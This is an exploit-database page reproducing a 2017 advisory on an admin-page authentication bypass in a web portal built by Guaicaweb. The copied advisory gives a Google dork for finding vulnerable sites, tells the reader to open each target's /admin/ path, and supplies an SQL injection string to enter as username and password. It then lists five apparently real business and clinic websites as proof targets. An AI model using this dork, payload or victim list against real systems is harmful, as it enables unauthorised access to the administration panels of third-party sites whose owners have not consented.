Advertisement






PORTAL WEB GUAICAWEB Bypass Admin Page Vulnerability

CVE Category Price Severity
N/A CWE-522 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2017-01-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010170

Below is a copy:

PORTAL WEB GUAICAWEB  Bypass Admin Page Vulnerability|=============================================================| 
|-------------------In The Name Of God------------------------|  
| 
| Exploit Title: PORTAL WEB DESARROLLADO POR GUAICAWEB COMUNICACIONES Bypass Admin Page Vulnerability 
| 
| Exploit Author: Ashiyane Digital Security Team  
| 
| Vendor Homepage:http://www.guaicaweb.com/
| 
| Google Dork : intext:PORTAL WEB DESARROLLADO POR GUAICAWEB COMUNICACIONES inurl:/index.php?target=  
| 
| Tested on: Windows 10 ~~~> Mozilla Firefox 
| 
| Date: 1/20/2017 
|==========================================================| 
| Then Choose a Target and put this after URL : /admin/ 
|=========| 
| And fill username and password like the information below : 
| Username : '=' 'or' 
| Password : '=' 'or' 
| ==========================================================| 
| Proof : 
| 
| http://www.hotelimperial.com.ve/admin/ 
| 
| http://laboratoriosabd.com/admin/
| 
| http://www.guaicaweb.com/admin/  
| 
| http://www.clinicalafe.com/admin/
| 
| http://www.metalplastic.com.ve/admin/
| 
|=============================================================| 
| Discovered By : HackFans 
|=============================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.